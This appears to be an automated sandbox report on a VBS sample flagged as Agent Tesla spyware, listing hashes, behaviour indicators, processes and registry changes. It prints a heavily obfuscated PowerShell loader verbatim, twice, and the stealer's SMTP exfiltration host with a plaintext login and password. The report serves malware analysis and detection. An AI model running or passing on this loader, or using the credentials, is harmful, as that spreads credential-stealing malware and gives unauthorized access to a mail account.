File name:

8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs

Full analysis: https://app.any.run/tasks/a4bd0fad-7846-4629-836a-3eb7570d803d
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Malware Trends Tracker     >>>
Analysis date: March 19, 2024, 08:52:56
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
evasion
stealer
agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

C76A93BC5DB1B5A8F1E064AB0E51A4D0

SHA1:

D9BC68197C03634E12AD62F01C078EB1BC9722BB

SHA256:

8DFC4DA6CDDBE96A8EEE81460A0352846A686AE31B567742F4F7E19C0A778C46

SSDEEP:

3072:sP4yENVBkYr4LhpVXpKnupn8kH3DPbkhZi3eNRMpWOuMvmOfyYqygQXUqIZm+:sP4yENVOY0NpVXpK68kH3DPbkhZi3eND

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Steals credentials from Web Browsers

      • wab.exe (PID: 5672)

    • Actions looks like stealing of personal data

      • wab.exe (PID: 5672)

    • AGENTTESLA has been detected (YARA)

      • wab.exe (PID: 5672)

    • Scans artifacts that could help determine the target

      • wab.exe (PID: 5672)

  • SUSPICIOUS

    • Evaluates numerical expressions in cmd (potential data obfuscation)

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 2260)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2532)
      • powershell.exe (PID: 1068)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2532)

    • Checks Windows Trust Settings

      • wab.exe (PID: 5672)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 5672)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 2260)

    • Checks for external IP

      • wab.exe (PID: 5672)

    • Connects to SMTP port

      • wab.exe (PID: 5672)

  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 2532)
      • powershell.exe (PID: 1068)

    • Checks supported languages

      • wab.exe (PID: 5672)

    • Reads the computer name

      • wab.exe (PID: 5672)

    • Checks proxy server information

      • wab.exe (PID: 5672)
      • slui.exe (PID: 1404)

    • Creates files or folders in the user directory

      • wab.exe (PID: 5672)

    • Reads Environment values

      • wab.exe (PID: 5672)

    • Reads the machine GUID from the registry

      • wab.exe (PID: 5672)

    • Reads the software policy settings

      • wab.exe (PID: 5672)
      • slui.exe (PID: 1404)

    • Reads Microsoft Office registry keys

      • wab.exe (PID: 5672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process(5672) wab.exe
Protocolsmtp
Hostmail.ardsmmm.com
Port587
Usernameinfo@ardsmmm.com
PasswordArd2015**
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs #AGENTTESLA wab.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1068"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spermagonia sknhedsaabenbaringens Eftermiddagsforestillinger Manipulatory Forureningsbegrebene #>;$everwho=(cmd /c set /A 115^^0);Function Elskerinder ([String]$Programmel){$everwho=[char][int]$everwho;$Tilskudsregelensnvaliditets=$everwho+'ubstring';$Misterming=8;$Nettovgtenes=opholdsomraadet($Programmel);For($Tilskudsregelens=7; $Tilskudsregelens -lt $Nettovgtenes; $Tilskudsregelens+=$Misterming){$Chutists=$Programmel.$Tilskudsregelensnvaliditets.Invoke($Tilskudsregelens, 1);$Simosaurus=$Simosaurus+$Chutists;}$Simosaurus;}function Pitbird ($Pawnor){. ($Oceanologer) ($Pawnor);}function opholdsomraadet ([String]$isopogonous){$Ingenirgerningerne=$isopogonous.Length-1;$Ingenirgerningerne;}$Glacon=Elskerinder 'Uddr geT LgeundrWo,dsycaUdgift,nDentninsRetsp.ifBorteske PanayarAmb,tior.quilibiDigekronAspsteugNond ce ';$Registreringspligter=Elskerinder 'Unme,eshKofusket LignintOdontoipEncinalsHyp.rtr: Disc n/S.marbe/AutoerodVa iolarMicrophi .rydnivInos,oaeRadevor.SubjpongC tholioSub.erroWasteingIndsbnilnamaq.aeCommont.H,rmafrcDistin oHor eummProst.t/Konfek,uarmlngdcScaurie?TranspleVersatix AktieppControvoEsse.serH.ubitst,aknemm=Na.tehidStrychno,appendwOutcre.n FrdigblNonsensoNo emcoaDuoersrdSofacyk&Thinglii S,skatdshopocr=Flaadde1Diddest0AftrdrirJavanesxIdea ios MomiolHBeklageG.ameablyR imondlIn.estmM Exil.n5OrdreekXAktionrj scendedPlac.an8 nnestlGProsodu5ConcussrIshmaelEamorfeiZ UnchemOStip laUPreapprCUd,mmebEregenerrChuggertLeptomo3 LatchltBlokfunZbearpawbRigse.baDebattryAmtsraawOswegoa ';$Oceanologer=Elskerinder 'AsieerfisaltnineUnlingexK.adran ';$Kollaborationers19=Elskerinder 'Superbe$fangedegMissionlTollento Delectb Parabea Flag.il Afrens:VioloneWReallnsi CineplnHjree,sd ApplicsPentanduStudievrHjerterfSynneuse Disponn Kynde,dPensi,neRent,besmisvist1Ba,ales8Skuffem7Halteri Wanting=Fejlmar Sk,ldflSInterc.tcounteraSt,eetwrUnwatertRebutta-FlbetssBNonclimiDistingtInvokedsNonradiTStileemrpredestaStumtjenTimefulsPegefinfHvdettee chesterDrab,ma Oldem,-PolytekS PowderoMustineuWeaponsrAarsta.cUnrul eeNationa Ddsstra$SkibstmRSvalegaeTro ersgPo rgaei FingersHedeblgtD lettarfossi,ie aderasr Tegnefi AntirenMonroligGeneralsHerrernpRadonurl remailimopboargPo.phyrt FranskeKume.ierDissert Lidseev-UninvigDaffricae S.bnatsPostcomtWhitewoiUln geun udfrdiaGrapholt Axt,eeiLoutishoE.hvervn Unwebb Lirkep$SalgsdiDVarmeler Inembrv Indstro Regl rgMagtedetSa.gsmae Dop,ngrCrumbiee Flnse.rRetsmed ';Pitbird (Elskerinder 'metodis$Tinta lgVidenskl Fyld.goJoukerybfritureaOverpr.lTribute: AdderiD Scle trDiarrsrv BaltisoMidsommgPlimraatProtoleeAendrinr Nab,breKleenexrTempusf=Sjappeg$SkopudseBroid,rnblo.forvGi arti: StoremaDedicatpcystinup KnappedPartikaaShireestRototilaHelbred ') ;Pitbird (Elskerinder 'OchringISkolarsmPhilosopSifonsfoIversenrSwordgrtenkemnd- NoumenMBirlerjoStrengedAvowabluelfenbelToyscyteApotele Forba.rBTrisylliAfmnstrtKerne.es SucceeTVvninggrCpusanta Fregnen Hallo,s FractafAtomaffepat,uljrPeritom ') ;$Drvogterer=$Drvogterer+'\Mannersome.Jas' ;Pitbird (Elskerinder 'Depreda$Plattelg Te,raslFoozlero U,ocenbInderk a Ma skslmagneti:EarstonK.ommunao.antamkmVaregldmTo,ngleaCapsulinAntechadFadgedmoSlibrigtafsondryIntuitipuni,luseDysodi,n,ymbolisgarialf=Ampulla(SkatteiTFoeltaieforblstsForblomt Hesper-ReshocePvic,neuaSulphurtfosso.ihNimurta Withers$HerlufmD .woundr ormaldvStiletho Artelsgvelsespt TravaleUpte.rsrTandemmeG.untyerS umarb)chimney ') ;while (-not $Kommandotypens) {Pitbird (Elskerinder 'Ka,ksteIdis endf Outv c Amst,up( Idiose$ let anWLek.ikaiAmary,ln Skue pd AphthissentimeuDekadenrMaanedafKnawelseKrak.lsnForbi dd LovligeUudsl.ts Overra1,ppleti8Bluede,7Reumati. EnergiJAsselfto NulstibRoycesiSNewspaptMillimeaDrift,gtFabul,reO lsdrm Metrosa-ProfesseMilevidqRetrans Hjhuset$KapsmbaG HydrarlBrnehavaNetvrkscFiksersoAvancemn He,ago)Ko.cent observa{Unfreq SGo,elintMakrop.aDumb,ourNightsptHistori-FreudiaSStrm,evl Hy.roleMillia,e Tel.nepPulingl Hematom1 Arbejd}Prelatie CerouslKapunersGo.lieseexonera{UsurperSBobadiltunassura Udbld rAdiposetHum ede- Kvld rS PythaglTetrammesuasiveeBreddespStandar Frilgge1Sterlet;PinkeyeP MarkariOpvoksetCerningbd sartiiProconfrLaeserudUnringi olsmnd$U ortalKTaljereoSmaavasl EligiblRetninga ordkrib SonsieoSprightrNeighboaUnpaupet RakeryiMacr,pooTeknok nAnesthaeVarmeslr.toikersP.oprie1Ak.ionr9Befordr}instruc ');Pitbird (Elskerinder 'Sprngfa$Husblasg ruktoslPolletao ,ruppebAngorasa PoloidlInven i:FordrinKFindelnoKampkunmGnostikmPreacheaVerbessnKongruedSlerundoImprovit.rbejdsyVig liepusingsieMikr,sknP nplegsguddoms=Enchodo( shellsT karyateInfractsBurgonet Sali y- illionPSquibcraaandendtAflvninhLu inou Vivisek$KnbjninDlurifakrHaabenevKnubango QuadrugUndersktdemursceKodedekrR,foundeUnfraterSelvb.d)Te krat ') ;}Pitbird (Elskerinder 'Demo.al$Rabatg gPodophtlturetb,oGltmercbCavespiaSurreptlDybgang:soveposTT.eomaniWyat,naseudialysBudgetoeProctodnSpindehdGulspureNationa G.atem=Fiske i S etlaGReimposeBesaan,t.hilier-Ba.tardCSpans,roUnoterenShutin,tPredevoeIncremengoofingtmor idi Tronflg$UteroloDBunin hr,rnumrevudstdnioKellysag Grimplt StranseAarstalrOmstni,ePa,riotr Diver ');Pitbird (Elskerinder ' Transs$Op.endigSenatsml ToxogloForblffb SmitstaDooziealOverpro: FasedeBIndertrl TjeneseCurwhibpPlastikhReprimeabredererDeputataInca oc2Baadvrf5Stjrten Hammers=Croupin Seedsme[.vulstiSRddeligyHanebjlsAcharyatLserbr.e Af,ropm Septen.An.amliCFiskehaoP,tagonnCha icovMyoglobeOpdrtterParoxyttNeph od]foroege: inflat: S agteF P.ecedrUnindigoA.ticarmSympatiBDansantaAccelersEfterfleFuruncu6Interpr4 CampinSTriasfot Solaarr BegraviDrk,rmsn Teatreg.olumes( Tudeho$ObrogatTTolvtaliKuarsyns Fl,wsmsTjretscestfrontn Ento odDartleseTetrar )Trrelse ');Pitbird (Elskerinder 'Tidsste$ BlattagUpalleylBesvrlioProctopbClasm taP.rtmanlTrouble:PlacardS Cherylk Taga,ayUd.eligdKonkur.eUndigitv PensioiFungivonUan,kuedVoluptuu.ugteneeRestindrpap rus Indel k=Sniffle Ka,itt[ coolamSSikkerhyHoneysssdyppelstIn.hsteeSsk,ndem Resul .M.ngfolTRosenshe De,ertxDressertsmaikra.Nulls,iEAkt.tykn Re,entcDeratizo paasked unctioi Flexibnsammensg,djamen]Afsone.:R.mdisk: PaaligAEnarme.SPrein,rCTimet.rIKen,emrIV lpici.Prosc.lGUdslusnesongishtNonvenaSleverintse.rsskrVerdensiLiteratnBehandlg Dentil(Landska$NemmedeBGedesbylAfhaarieGrisedepLystbaah .chervaAnvenderLetfordaWhitest2Spidser5Samment)Auxamyl ');Pitbird (Elskerinder ' archit$Pileat,gE yoreblPo ychroTankninbKonomiba monochlSismoth:SpisestkStedsbiostandarlFljlsble BombesrAlba itaf.lkeuneTunnelmpGigantoi AlkylodJobskabe Ghettom Somme iRumdumhsUnde.si=Haerene$Tilsta SUntermik.ippopoyBortadodVa,rdieeLserforvTrip asiAktuelln peccabds.angstuRylenbaeHyperadr degnes. NonsilsLeaventuElegancbMadonnasBeruthitMendelsrTaprobaiO egasgnFugtdangOverexc(breadle3trenche3 Scrayf2 ornbls9 Fabrik1 Beewee9legacyk,Sous,he3 Plai e0Afgasni7Fohnsb.6Viscosi9Extrava) immigr ');Pitbird $koleraepidemis;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
1404C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
2260"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Spermagonia sknhedsaabenbaringens Eftermiddagsforestillinger Manipulatory Forureningsbegrebene #>;$everwho=(cmd /c set /A 115^^0);Function Elskerinder ([String]$Programmel){$everwho=[char][int]$everwho;$Tilskudsregelensnvaliditets=$everwho+'ubstring';$Misterming=8;$Nettovgtenes=opholdsomraadet($Programmel);For($Tilskudsregelens=7; $Tilskudsregelens -lt $Nettovgtenes; $Tilskudsregelens+=$Misterming){$Chutists=$Programmel.$Tilskudsregelensnvaliditets.Invoke($Tilskudsregelens, 1);$Simosaurus=$Simosaurus+$Chutists;}$Simosaurus;}function Pitbird ($Pawnor){. ($Oceanologer) ($Pawnor);}function opholdsomraadet ([String]$isopogonous){$Ingenirgerningerne=$isopogonous.Length-1;$Ingenirgerningerne;}$Glacon=Elskerinder 'Uddr geT LgeundrWo,dsycaUdgift,nDentninsRetsp.ifBorteske PanayarAmb,tior.quilibiDigekronAspsteugNond ce ';$Registreringspligter=Elskerinder 'Unme,eshKofusket LignintOdontoipEncinalsHyp.rtr: Disc n/S.marbe/AutoerodVa iolarMicrophi .rydnivInos,oaeRadevor.SubjpongC tholioSub.erroWasteingIndsbnilnamaq.aeCommont.H,rmafrcDistin oHor eummProst.t/Konfek,uarmlngdcScaurie?TranspleVersatix AktieppControvoEsse.serH.ubitst,aknemm=Na.tehidStrychno,appendwOutcre.n FrdigblNonsensoNo emcoaDuoersrdSofacyk&Thinglii S,skatdshopocr=Flaadde1Diddest0AftrdrirJavanesxIdea ios MomiolHBeklageG.ameablyR imondlIn.estmM Exil.n5OrdreekXAktionrj scendedPlac.an8 nnestlGProsodu5ConcussrIshmaelEamorfeiZ UnchemOStip laUPreapprCUd,mmebEregenerrChuggertLeptomo3 LatchltBlokfunZbearpawbRigse.baDebattryAmtsraawOswegoa ';$Oceanologer=Elskerinder 'AsieerfisaltnineUnlingexK.adran ';$Kollaborationers19=Elskerinder 'Superbe$fangedegMissionlTollento Delectb Parabea Flag.il Afrens:VioloneWReallnsi CineplnHjree,sd ApplicsPentanduStudievrHjerterfSynneuse Disponn Kynde,dPensi,neRent,besmisvist1Ba,ales8Skuffem7Halteri Wanting=Fejlmar Sk,ldflSInterc.tcounteraSt,eetwrUnwatertRebutta-FlbetssBNonclimiDistingtInvokedsNonradiTStileemrpredestaStumtjenTimefulsPegefinfHvdettee chesterDrab,ma Oldem,-PolytekS PowderoMustineuWeaponsrAarsta.cUnrul eeNationa Ddsstra$SkibstmRSvalegaeTro ersgPo rgaei FingersHedeblgtD lettarfossi,ie aderasr Tegnefi AntirenMonroligGeneralsHerrernpRadonurl remailimopboargPo.phyrt FranskeKume.ierDissert Lidseev-UninvigDaffricae S.bnatsPostcomtWhitewoiUln geun udfrdiaGrapholt Axt,eeiLoutishoE.hvervn Unwebb Lirkep$SalgsdiDVarmeler Inembrv Indstro Regl rgMagtedetSa.gsmae Dop,ngrCrumbiee Flnse.rRetsmed ';Pitbird (Elskerinder 'metodis$Tinta lgVidenskl Fyld.goJoukerybfritureaOverpr.lTribute: AdderiD Scle trDiarrsrv BaltisoMidsommgPlimraatProtoleeAendrinr Nab,breKleenexrTempusf=Sjappeg$SkopudseBroid,rnblo.forvGi arti: StoremaDedicatpcystinup KnappedPartikaaShireestRototilaHelbred ') ;Pitbird (Elskerinder 'OchringISkolarsmPhilosopSifonsfoIversenrSwordgrtenkemnd- NoumenMBirlerjoStrengedAvowabluelfenbelToyscyteApotele Forba.rBTrisylliAfmnstrtKerne.es SucceeTVvninggrCpusanta Fregnen Hallo,s FractafAtomaffepat,uljrPeritom ') ;$Drvogterer=$Drvogterer+'\Mannersome.Jas' ;Pitbird (Elskerinder 'Depreda$Plattelg Te,raslFoozlero U,ocenbInderk a Ma skslmagneti:EarstonK.ommunao.antamkmVaregldmTo,ngleaCapsulinAntechadFadgedmoSlibrigtafsondryIntuitipuni,luseDysodi,n,ymbolisgarialf=Ampulla(SkatteiTFoeltaieforblstsForblomt Hesper-ReshocePvic,neuaSulphurtfosso.ihNimurta Withers$HerlufmD .woundr ormaldvStiletho Artelsgvelsespt TravaleUpte.rsrTandemmeG.untyerS umarb)chimney ') ;while (-not $Kommandotypens) {Pitbird (Elskerinder 'Ka,ksteIdis endf Outv c Amst,up( Idiose$ let anWLek.ikaiAmary,ln Skue pd AphthissentimeuDekadenrMaanedafKnawelseKrak.lsnForbi dd LovligeUudsl.ts Overra1,ppleti8Bluede,7Reumati. EnergiJAsselfto NulstibRoycesiSNewspaptMillimeaDrift,gtFabul,reO lsdrm Metrosa-ProfesseMilevidqRetrans Hjhuset$KapsmbaG HydrarlBrnehavaNetvrkscFiksersoAvancemn He,ago)Ko.cent observa{Unfreq SGo,elintMakrop.aDumb,ourNightsptHistori-FreudiaSStrm,evl Hy.roleMillia,e Tel.nepPulingl Hematom1 Arbejd}Prelatie CerouslKapunersGo.lieseexonera{UsurperSBobadiltunassura Udbld rAdiposetHum ede- Kvld rS PythaglTetrammesuasiveeBreddespStandar Frilgge1Sterlet;PinkeyeP MarkariOpvoksetCerningbd sartiiProconfrLaeserudUnringi olsmnd$U ortalKTaljereoSmaavasl EligiblRetninga ordkrib SonsieoSprightrNeighboaUnpaupet RakeryiMacr,pooTeknok nAnesthaeVarmeslr.toikersP.oprie1Ak.ionr9Befordr}instruc ');Pitbird (Elskerinder 'Sprngfa$Husblasg ruktoslPolletao ,ruppebAngorasa PoloidlInven i:FordrinKFindelnoKampkunmGnostikmPreacheaVerbessnKongruedSlerundoImprovit.rbejdsyVig liepusingsieMikr,sknP nplegsguddoms=Enchodo( shellsT karyateInfractsBurgonet Sali y- illionPSquibcraaandendtAflvninhLu inou Vivisek$KnbjninDlurifakrHaabenevKnubango QuadrugUndersktdemursceKodedekrR,foundeUnfraterSelvb.d)Te krat ') ;}Pitbird (Elskerinder 'Demo.al$Rabatg gPodophtlturetb,oGltmercbCavespiaSurreptlDybgang:soveposTT.eomaniWyat,naseudialysBudgetoeProctodnSpindehdGulspureNationa G.atem=Fiske i S etlaGReimposeBesaan,t.hilier-Ba.tardCSpans,roUnoterenShutin,tPredevoeIncremengoofingtmor idi Tronflg$UteroloDBunin hr,rnumrevudstdnioKellysag Grimplt StranseAarstalrOmstni,ePa,riotr Diver ');Pitbird (Elskerinder ' Transs$Op.endigSenatsml ToxogloForblffb SmitstaDooziealOverpro: FasedeBIndertrl TjeneseCurwhibpPlastikhReprimeabredererDeputataInca oc2Baadvrf5Stjrten Hammers=Croupin Seedsme[.vulstiSRddeligyHanebjlsAcharyatLserbr.e Af,ropm Septen.An.amliCFiskehaoP,tagonnCha icovMyoglobeOpdrtterParoxyttNeph od]foroege: inflat: S agteF P.ecedrUnindigoA.ticarmSympatiBDansantaAccelersEfterfleFuruncu6Interpr4 CampinSTriasfot Solaarr BegraviDrk,rmsn Teatreg.olumes( Tudeho$ObrogatTTolvtaliKuarsyns Fl,wsmsTjretscestfrontn Ento odDartleseTetrar )Trrelse ');Pitbird (Elskerinder 'Tidsste$ BlattagUpalleylBesvrlioProctopbClasm taP.rtmanlTrouble:PlacardS Cherylk Taga,ayUd.eligdKonkur.eUndigitv PensioiFungivonUan,kuedVoluptuu.ugteneeRestindrpap rus Indel k=Sniffle Ka,itt[ coolamSSikkerhyHoneysssdyppelstIn.hsteeSsk,ndem Resul .M.ngfolTRosenshe De,ertxDressertsmaikra.Nulls,iEAkt.tykn Re,entcDeratizo paasked unctioi Flexibnsammensg,djamen]Afsone.:R.mdisk: PaaligAEnarme.SPrein,rCTimet.rIKen,emrIV lpici.Prosc.lGUdslusnesongishtNonvenaSleverintse.rsskrVerdensiLiteratnBehandlg Dentil(Landska$NemmedeBGedesbylAfhaarieGrisedepLystbaah .chervaAnvenderLetfordaWhitest2Spidser5Samment)Auxamyl ');Pitbird (Elskerinder ' archit$Pileat,gE yoreblPo ychroTankninbKonomiba monochlSismoth:SpisestkStedsbiostandarlFljlsble BombesrAlba itaf.lkeuneTunnelmpGigantoi AlkylodJobskabe Ghettom Somme iRumdumhsUnde.si=Haerene$Tilsta SUntermik.ippopoyBortadodVa,rdieeLserforvTrip asiAktuelln peccabds.angstuRylenbaeHyperadr degnes. NonsilsLeaventuElegancbMadonnasBeruthitMendelsrTaprobaiO egasgnFugtdangOverexc(breadle3trenche3 Scrayf2 ornbls9 Fabrik1 Beewee9legacyk,Sous,he3 Plai e0Afgasni7Fohnsb.6Viscosi9Extrava) immigr ');Pitbird $koleraepidemis;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2532"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4076\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5672"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\Windows Mail\wab.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
AgentTesla
(PID) Process(5672) wab.exe
Protocolsmtp
Hostmail.ardsmmm.com
Port587
Usernameinfo@ardsmmm.com
PasswordArd2015**
6044"C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
6680"C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.746 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events
17 735
Read events
17 688
Write events
47
Delete events
0

Modification events

(PID) Process:(2532) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2532) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2532) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2532) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1068) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1068) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1068) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1068) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2260) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2260) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
0
Suspicious files
7
Text files
5
Unknown types
3

Dropped files

PID
Process
Filename
Type
2260powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:C76555487F3760099709FD7487BFB259
SHA256:AD8BEE1720C0631AAD060FC8CDC56D9B6AB83541731C816EA3D0AA2D073CE861
2260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xgleqfvy.sbo.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1068powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c43hbwvk.kqy.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ciayleg2.f4h.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5672wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAbinary
MD5:DDC63EB9D86E16BD737FE22E2A2F6CA1
SHA256:93BDF3D760D20289F9FAB5F2162F9E068A7E065F773D0E152CC2021EEB813DB3
5672wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_2517452929F0CAF6449847D40B7C277Dbinary
MD5:DD99E4375181D974A045FE71CAC19794
SHA256:CD22886855D32E49257374F9AE9E9E50EEC83A89513602A319A77583D1B44625
1068powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:7DFE7EF903F79BE9179FFE163DE9B0C6
